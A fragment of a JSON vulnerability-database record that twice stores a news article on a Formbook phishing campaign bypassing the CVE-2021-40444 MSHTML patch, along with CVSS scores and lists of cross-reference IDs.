[&quot;RH:CVE-2021-45046&quot;]}, {&quot;type&quot;: &quot;attackerkb&quot;, &quot;idList&quot;: [&quot;AKB:398CAD69-31E4-4276-B510-D93B2C648A74&quot;]}, {&quot;type&quot;: &quot;nessus&quot;, &quot;idList&quot;: [&quot;APACHE_LOG4J_2_16_0.NASL&quot;, &quot;FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL&quot;, &quot;APACHE_LOG4SHELL_CVE-2021-45056_DIRECT_CHECK.NBIN&quot;, &quot;APACHE_LOG4J_2_16_0_MAC.NASL&quot;]}, {&quot;type&quot;: &quot;f5&quot;, &quot;idList&quot;: [&quot;F5:K32171392&quot;]}, {&quot;type&quot;: &quot;thn&quot;, &quot;idList&quot;: [&quot;THN:14CB4751E7438DE917A5DB217D67AA29&quot;, &quot;THN:E006E516DD134F047ED991AC23F057A4&quot;, &quot;THN:F8D94BE25D6D25E0F52FB4433E619721&quot;, &quot;THN:DC2D78987D283D806FF145511EF10596&quot;, &quot;THN:6E47D45D685F44083BE0A6763799D209&quot;, &quot;THN:602D65D576B090BAC4B0C96998F8F922&quot;, &quot;THN:7192158FCB73BD803AF179B755D61CD1&quot;, &quot;THN:FADB0A82C9DCE0870E617D4A8E5A34A6&quot;, &quot;THN:15D4F25153F9911661383B3B2153469D&quot;, &quot;THN:683B509BDB84EA9FEBCF0B1EE68D0C08&quot;, &quot;THN:C221700D7BBC27110090E137F7288FA3&quot;, &quot;THN:16B3DB5DFBB6E86B79815E0E44D48021&quot;, &quot;THN:1E1BEA193C556F91F471CD5B785B85B3&quot;, &quot;THN:1E4DA950F02E02DFD1649B39A06A82C6&quot;, &quot;THN:5D8CEBFFF41D128545CD83F6F45D68F4&quot;, &quot;THN:3E7257F45C71DCBDD0C320E7AAF383CA&quot;, &quot;THN:4BC5D1A9ACDADBABF85BF51166D61386&quot;, &quot;THN:0468E8E1C5525F2A9F2ED37592AE0910&quot;, &quot;THN:88184AFF85BF7EC0848D95E6BB0BEDB4&quot;, &quot;THN:317555CB8AA3A9E1AE70E218E44CC2EE&quot;, &quot;THN:36D12A8768EE450B36B1C8D186F023E5&quot;, &quot;THN:7A9C39D8DACC3A4C7336ECA18FD3D889&quot;]}, {&quot;type&quot;: &quot;checkpoint_advisories&quot;, &quot;idList&quot;: [&quot;CPAI-2021-0936&quot;]}, {&quot;type&quot;: &quot;ibm&quot;, &quot;idList&quot;: [&quot;BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423&quot;, &quot;B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA&quot;]}, {&quot;type&quot;: &quot;vmware&quot;, &quot;idList&quot;: [&quot;VMSA-2021-0028.3&quot;, &quot;VMSA-2021-0028.7&quot;, &quot;VMSA-2021-0028.6&quot;, &quot;VMSA-2021-0028.4&quot;]}, {&quot;type&quot;: &quot;citrix&quot;, &quot;idList&quot;: [&quot;CTX335705&quot;]}, {&quot;type&quot;: &quot;paloalto&quot;, &quot;idList&quot;: [&quot;PA-CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;kitploit&quot;, &quot;idList&quot;: [&quot;KITPLOIT:3513995154890920933&quot;, &quot;KITPLOIT:947451673153182578&quot;, &quot;KITPLOIT:7406299109796896562&quot;, &quot;KITPLOIT:7177556429566123490&quot;, &quot;KITPLOIT:1487673841997538195&quot;, &quot;KITPLOIT:1116858433130862595&quot;, &quot;KITPLOIT:7361487176057906613&quot;, &quot;KITPLOIT:6188677228738043195&quot;, &quot;KITPLOIT:7732767273007213002&quot;, &quot;KITPLOIT:4421608795708983078&quot;, &quot;KITPLOIT:2159968738033160261&quot;, &quot;KITPLOIT:4821189879086056896&quot;, &quot;KITPLOIT:5551207059042758241&quot;, &quot;KITPLOIT:4461530198362210216&quot;, &quot;KITPLOIT:6915122524602354782&quot;, &quot;KITPLOIT:2101113398719974316&quot;, &quot;KITPLOIT:5490188589941452239&quot;, &quot;KITPLOIT:5630391982139629672&quot;, &quot;KITPLOIT:5385557770944788655&quot;, &quot;KITPLOIT:5446238339799679445&quot;, &quot;KITPLOIT:1585582972103346948&quot;, &quot;KITPLOIT:3417108961255220043&quot;, &quot;KITPLOIT:1600795799957954546&quot;, &quot;KITPLOIT:8835492417164609502&quot;, &quot;KITPLOIT:8789812223087643496&quot;, &quot;KITPLOIT:6065510189732231326&quot;, &quot;KITPLOIT:7763368513853981943&quot;, &quot;KITPLOIT:446619964056673685&quot;, &quot;KITPLOIT:1363445850221033458&quot;, &quot;KITPLOIT:6101940381122512875&quot;, &quot;KITPLOIT:3694213314627297001&quot;, &quot;KITPLOIT:4467797749428637545&quot;, &quot;KITPLOIT:8266280488141559893&quot;, &quot;KITPLOIT:8748981538352893528&quot;, &quot;KITPLOIT:101652450875936271&quot;, &quot;KITPLOIT:8438544531421984304&quot;, &quot;KITPLOIT:1450641854881225942&quot;, &quot;KITPLOIT:627872739243871300&quot;, &quot;KITPLOIT:1905680917068019746&quot;, &quot;KITPLOIT:4063231183777899142&quot;, &quot;KITPLOIT:4896285981647368390&quot;, &quot;KITPLOIT:4090709243453172614&quot;, &quot;KITPLOIT:3272262582020242324&quot;, &quot;KITPLOIT:2577977379976668576&quot;, &quot;KITPLOIT:7222117641972443751&quot;, &quot;KITPLOIT:6759391622067035795&quot;, &quot;KITPLOIT:3109235077301002673&quot;, &quot;KITPLOIT:8578284127725295960&quot;, &quot;KITPLOIT:1018545834110483395&quot;, &quot;KITPLOIT:4556506042661879310&quot;, &quot;KITPLOIT:5387473293315956674&quot;]}, {&quot;type&quot;: &quot;githubexploit&quot;, &quot;idList&quot;: [&quot;9C874FAC-8640-5978-8C60-AF6528E5DF60&quot;, &quot;26905C55-5DC7-5275-A0AF-FAF06685612E&quot;, &quot;C6493FD0-579F-593F-A1E9-A44793F70419&quot;]}, {&quot;type&quot;: &quot;freebsd&quot;, &quot;idList&quot;: [&quot;650734B2-7665-4170-9A0A-EECED5E10A5E&quot;]}, {&quot;type&quot;: &quot;github&quot;, &quot;idList&quot;: [&quot;GHSA-7RJR-3Q55-VV33&quot;]}, {&quot;type&quot;: &quot;kaspersky&quot;, &quot;idList&quot;: [&quot;KLA12391&quot;]}, {&quot;type&quot;: &quot;redhat&quot;, &quot;idList&quot;: [&quot;RHSA-2021:5106&quot;]}], &quot;modified&quot;: &quot;2021-12-23T10:42:43&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 3.8, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-23T10:42:43&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;_object_type&quot;: &quot;robots.models.thn.ThnBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.thn.ThnBulletin&quot;, &quot;robots.models.base.Bulletin&quot;]}, {&quot;id&quot;: &quot;THN:8A60310AB796B7372A105B7C8811306B&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;f1c7fda7e92cc52baf994d42e93135fc&quot;, &quot;type&quot;: &quot;thn&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: &quot;New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw&quot;, &quot;description&quot;: &quot;[![Microsoft MSHTML RCE](https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8=s728-e1000)](&lt;https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8&gt;)\n\nA short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.\n\n\&quot;The attachments represent an escalation of the attacker&#x27;s abuse of the CVE-2021-40444 bug and demonstrate that even a patch can&#x27;t always mitigate the actions of a motivated and sufficiently skilled attacker,\&quot; SophosLabs researchers Andrew Brandt and Stephen Ormandy [said](&lt;https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/&gt;) in a new report published Tuesday.\n\n[CVE-2021-40444](&lt;https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444&gt;) (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 [Patch Tuesday updates](&lt;https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html&gt;), it has been put to use in [multiple attacks](&lt;https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html&gt;) ever since details pertaining to the flaw became public.\n\n[![Automatic GitHub Backups]()](&lt;https://go.thn.li/backhub-d2&gt; \&quot;Automatic GitHub Backups\&quot; )\n\nThat same month, the technology giant [uncovered](&lt;https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html&gt;) a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. Then in November, SafeBreach Labs [reported](&lt;https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html&gt;) details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.\n\nThe new campaign discovered by Sophos aims to get around the patch&#x27;s protection by morphing a publicly available [proof-of-concept Office exploit](&lt;https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20&#x27;Ext2Prot&#x27;%20Vulnerability%20&#x27;CABless&#x27;%20version.pdf&gt;) and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a \&quot;too-narrowly focused patch.\&quot;\n\n[![Microsoft MSHTML RCE](https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB=s728-e1000)](&lt;https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB&gt;)\n\n\&quot;In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file,\&quot; the researchers explained. \&quot;When Microsoft&#x27;s patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive.\&quot;\n\n**CAB-less 40444**, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. The RAR file, in turn, included a script written in Windows Script Host ([WSH](&lt;https://en.wikipedia.org/wiki/Windows_Script_Host&gt;)) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.\n\nConsequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the [Formbook](&lt;https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook&gt;) malware payload from an attacker-controlled website.\n\n[![Prevent Data Breaches]()](&lt;https://go.thn.li/crowdsec-inside-2&gt; \&quot;Prevent Data Breaches\&quot; )\n\nAs for why the exploit disappeared a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn&#x27;t work with older versions of the WinRAR utility. \&quot;So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release,\&quot; the researchers said.\n\n\&quot;This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases,\&quot; SophosLabs Principal Researcher Andrew Brandt said. \&quot;Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the &#x27;enable content&#x27; button.\&quot;\n\n\&quot;It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don&#x27;t know,\&quot; Brandt added. When reached for a response, a Microsoft spokesperson said \&quot;we are investigating these reports and will take appropriate action as needed to help keep customers protected.\&quot;\n\n  \n\n\nFound this article interesting? Follow THN on [Facebook](&lt;https://www.facebook.com/thehackernews&gt;), [Twitter _\uf099_](&lt;https://twitter.com/thehackersnews&gt;) and [LinkedIn](&lt;https://www.linkedin.com/company/thehackernews/&gt;) to read more exclusive content we post.\n&quot;, &quot;published&quot;: &quot;2021-12-22T07:45:00&quot;, &quot;modified&quot;: &quot;2021-12-23T05:21:19&quot;, &quot;cvss&quot;: {&quot;score&quot;: 6.8, &quot;vector&quot;: &quot;AV:N/AC:M/Au:N/C:P/I:P/A:P&quot;}, &quot;cvss2&quot;: {&quot;acInsufInfo&quot;: false, &quot;cvssV2&quot;: {&quot;accessComplexity&quot;: &quot;MEDIUM&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;availabilityImpact&quot;: &quot;PARTIAL&quot;, &quot;baseScore&quot;: 6.8, &quot;confidentialityImpact&quot;: &quot;PARTIAL&quot;, &quot;integrityImpact&quot;: &quot;PARTIAL&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:M/Au:N/C:P/I:P/A:P&quot;, &quot;version&quot;: &quot;2.0&quot;}, &quot;exploitabilityScore&quot;: 8.6, &quot;impactScore&quot;: 6.4, &quot;obtainAllPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;severity&quot;: &quot;MEDIUM&quot;, &quot;userInteractionRequired&quot;: true}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;HIGH&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;CHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;HIGH&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 9.0, &quot;baseSeverity&quot;: &quot;CRITICAL&quot;}, &quot;exploitabilityScore&quot;: 2.2, &quot;impactScore&quot;: 6.0}, &quot;href&quot;: &quot;https://thehackernews.com/2021/12/new-exploit-lets-malware-attackers.html&quot;, &quot;reporter&quot;: &quot;The Hacker News&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-40444&quot;, &quot;CVE-2021-45046&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T06:37:35&quot;, &quot;history&quot;: [{&quot;bulletin&quot;: {&quot;id&quot;: &quot;THN:8A60310AB796B7372A105B7C8811306B&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;37cab1a32890ce6bdb1dd2be684fdaff&quot;, &quot;type&quot;: &quot;thn&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: &quot;New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw&quot;, &quot;description&quot;: &quot;[![Microsoft MSHTML RCE](https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8=s728-e1000)](&lt;https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8&gt;)\n\nA short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.\n\n\&quot;The attachments represent an escalation of the attacker&#x27;s abuse of the CVE-2021-40444 bug and demonstrate that even a patch can&#x27;t always mitigate the actions of a motivated and sufficiently skilled attacker,\&quot; SophosLabs researchers Andrew Brandt and Stephen Ormandy [said](&lt;https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/&gt;) in a new report published Tuesday.\n\n[CVE-2021-40444](&lt;https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444&gt;) (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 [Patch Tuesday updates](&lt;https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html&gt;), it has been put to use in [multiple attacks](&lt;https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html&gt;) ever since details pertaining to the flaw became public.\n\n[![Automatic GitHub Backups]()](&lt;https://go.thn.li/backhub-dm1&gt; \&quot;Automatic GitHub Backups\&quot; )\n\nThat same month, the technology giant [uncovered](&lt;https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html&gt;) a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. Then in November, SafeBreach Labs [reported](&lt;https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html&gt;) details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.\n\nThe new campaign discovered by Sophos aims to get around the patch&#x27;s protection by morphing a publicly available [proof-of-concept Office exploit](&lt;https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20&#x27;Ext2Prot&#x27;%20Vulnerability%20&#x27;CABless&#x27;%20version.pdf&gt;) and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a \&quot;too-narrowly focused patch.\&quot;\n\n[![Microsoft MSHTML RCE](https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB=s728-e1000)](&lt;https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB&gt;)\n\n\&quot;In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file,\&quot; the researchers explained. \&quot;When Microsoft&#x27;s patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive.\&quot;\n\n**CAB-less 40444**, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. The RAR file, in turn, included a script written in Windows Script Host ([WSH](&lt;https://en.wikipedia.org/wiki/Windows_Script_Host&gt;)) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.\n\nConsequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the [Formbook](&lt;https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook&gt;) malware payload from an attacker-controlled website.\n\n[![Prevent Data Breaches]()](&lt;https://go.thn.li/crowdsec-inside-2&gt; \&quot;Prevent Data Breaches\&quot; )\n\nAs for why the exploit disappeared a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn&#x27;t work with older versions of the WinRAR utility. \&quot;So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release,\&quot; the researchers said.\n\n\&quot;This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases,\&quot; SophosLabs Principal Researcher Andrew Brandt said. \&quot;Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the &#x27;enable content&#x27; button.\&quot;\n\n\&quot;It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don&#x27;t know,\&quot; Brandt added.\n\n  \n\n\nFound this article interesting? Follow THN on [Facebook](&lt;https://www.facebook.com/thehackernews&gt;), [Twitter _\uf099_](&lt;https://twitter.com/thehackersnews&gt;) and [LinkedIn](&lt;https://www.linkedin.com/company/thehackernews/&gt;) to read more exclusive content we post.\n&quot;, &quot;published&quot;: &quot;2021-12-22T07:45:00&quot;, &quot;modified&quot;: &quot;2021-12-22T07:45:57&quot;, &quot;cvss&quot;: {&quot;score&quot;: 6.8, &quot;vector&quot;: &quot;AV:N/AC:M/Au:N/C:P/I:P/A:P&quot;}, &quot;cvss2&quot;: {&quot;acInsufInfo&quot;: false, &quot;cvssV2&quot;: {&quot;accessComplexity&quot;: &quot;MEDIUM&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;availabilityImpact&quot;: &quot;PARTIAL&quot;, &quot;baseScore&quot;: 6.8, &quot;confidentialityImpact&quot;: &quot;PARTIAL&quot;, &quot;integrityImpact&quot;: &quot;PARTIAL&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:M/Au:N/C:P/I:P/A:P&quot;, &quot;version&quot;: &quot;2.0&quot;}, &quot;exploitabilityScore&quot;: 8.6, &quot;impactScore&quot;: 6.4, &quot;obtainAllPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;severity&quot;: &quot;MEDIUM&quot;, &quot;userInteractionRequired&quot;: true}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;HIGH&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;CHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;HIGH&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 9.0, &quot;baseSeverity&quot;: &quot;CRITICAL&quot;}, &quot;exploitabilityScore&quot;: 2.2, &quot;impactScore&quot;: 6.0}, &quot;href&quot;: &quot;https://thehackernews.com/2021/12/new-exploit-lets-malware-attackers.html&quot;, &quot;reporter&quot;: &quot;The Hacker News&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-40444&quot;, &quot;CVE-2021-45046&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-22T08:37:36&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 23, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;attackerkb&quot;, &quot;idList&quot;: [&quot;AKB:398CAD69-31E4-4276-B510-D93B2C648A74&quot;, &quot;AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0&quot;]}, {&quot;type&quot;: &quot;cve&quot;, &quot;idList&quot;: [&quot;CVE-2021-40444&quot;, &quot;CVE-2021-45046&quot;]}, {&quot;type&quot;: &quot;kitploit&quot;, &quot;idList&quot;: [&quot;KITPLOIT:698315176468431184&quot;, &quot;KITPLOIT:5187040326820919368&quot;, &quot;KITPLOIT:4074521293617632933&quot;, &quot;KITPLOIT:4033244480100620751&quot;, &quot;KITPLOIT:2590785192528609562&quot;, &quot;KITPLOIT:5184284878903042540&quot;, &quot;KITPLOIT:5230148353750207837&quot;, &quot;KITPLOIT:6759391622067035795&quot;, &quot;KITPLOIT:1624142243530526923&quot;, &quot;KITPLOIT:942518396640901655&quot;, &quot;KITPLOIT:3456474172768099634&quot;, &quot;KITPLOIT:5550923684662771880&quot;, &quot;KITPLOIT:3697667464193804316&quot;]}, {&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-45046&quot;]}, {&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-45046&quot;]}, {&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2021-45046&quot;]}, {&quot;type&quot;: &quot;securelist&quot;, &quot;idList&quot;: [&quot;SECURELIST:63306FA6D056BD9A04969409AC790D84&quot;]}, {&quot;type&quot;: &quot;cisa&quot;, &quot;idList&quot;: [&quot;CISA:C70D91615E3DC8B589B493118D474566&quot;]}, {&quot;type&quot;: &quot;mssecure&quot;, &quot;idList&quot;: [&quot;MSSECURE:795E0A765679492C51FEFA2B19EAD597&quot;]}, {&quot;type&quot;: &quot;checkpoint_advisories&quot;, &quot;idList&quot;: [&quot;CPAI-2021-0554&quot;, &quot;CPAI-2021-0936&quot;]}, {&quot;type&quot;: &quot;mmpc&quot;, &quot;idList&quot;: [&quot;MMPC:795E0A765679492C51FEFA2B19EAD597&quot;]}, {&quot;type&quot;: &quot;trendmicroblog&quot;, &quot;idList&quot;: [&quot;TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE&quot;, &quot;TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2&quot;]}, {&quot;type&quot;: &quot;nessus&quot;, &quot;idList&quot;: [&quot;FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL&quot;, &quot;SMB_NT_MS21_IE_SEPT_2021.NASL&quot;, &quot;SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL&quot;, &quot;APACHE_LOG4SHELL_CVE-2021-45056_DIRECT_CHECK.NBIN&quot;]}, {&quot;type&quot;: &quot;f5&quot;, &quot;idList&quot;: [&quot;F5:K32171392&quot;]}, {&quot;type&quot;: &quot;thn&quot;, &quot;idList&quot;: [&quot;THN:602D65D576B090BAC4B0C96998F8F922&quot;, &quot;THN:1E4DA950F02E02DFD1649B39A06A82C6&quot;, &quot;THN:D4E86BD8938D3B2E15104CA4922A51F8&quot;, &quot;THN:DC2D78987D283D806FF145511EF10596&quot;, &quot;THN:16B3DB5DFBB6E86B79815E0E44D48021&quot;, &quot;THN:317555CB8AA3A9E1AE70E218E44CC2EE&quot;, &quot;THN:15D4F25153F9911661383B3B2153469D&quot;, &quot;THN:4BC5D1A9ACDADBABF85BF51166D61386&quot;, &quot;THN:0468E8E1C5525F2A9F2ED37592AE0910&quot;, &quot;THN:C4188C7A44467E425407D33067C14094&quot;, &quot;THN:F8D94BE25D6D25E0F52FB4433E619721&quot;, &quot;THN:59AE75C78D4644BFA6AD90225B3DE0C1&quot;, &quot;THN:3E7257F45C71DCBDD0C320E7AAF383CA&quot;, &quot;THN:E006E516DD134F047ED991AC23F057A4&quot;]}, {&quot;type&quot;: &quot;ibm&quot;, &quot;idList&quot;: [&quot;B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA&quot;, &quot;BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423&quot;]}, {&quot;type&quot;: &quot;vmware&quot;, &quot;idList&quot;: [&quot;VMSA-2021-0028.3&quot;, &quot;VMSA-2021-0028.4&quot;, &quot;VMSA-2021-0028.7&quot;, &quot;VMSA-2021-0028.6&quot;]}, {&quot;type&quot;: &quot;paloalto&quot;, &quot;idList&quot;: [&quot;PA-CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;citrix&quot;, &quot;idList&quot;: [&quot;CTX335705&quot;]}, {&quot;type&quot;: &quot;rapid7blog&quot;, &quot;idList&quot;: [&quot;RAPID7BLOG:AE824D3989C792700A622C455D8EE160&quot;]}, {&quot;type&quot;: &quot;krebs&quot;, &quot;idList&quot;: [&quot;KREBS:409088FC2DFC219B74043104C2B672CC&quot;]}, {&quot;type&quot;: &quot;githubexploit&quot;, &quot;idList&quot;: [&quot;E06577DB-A581-55E1-968E-81430C294A84&quot;, &quot;24DE1902-4427-5442-BF63-7657293966E2&quot;, 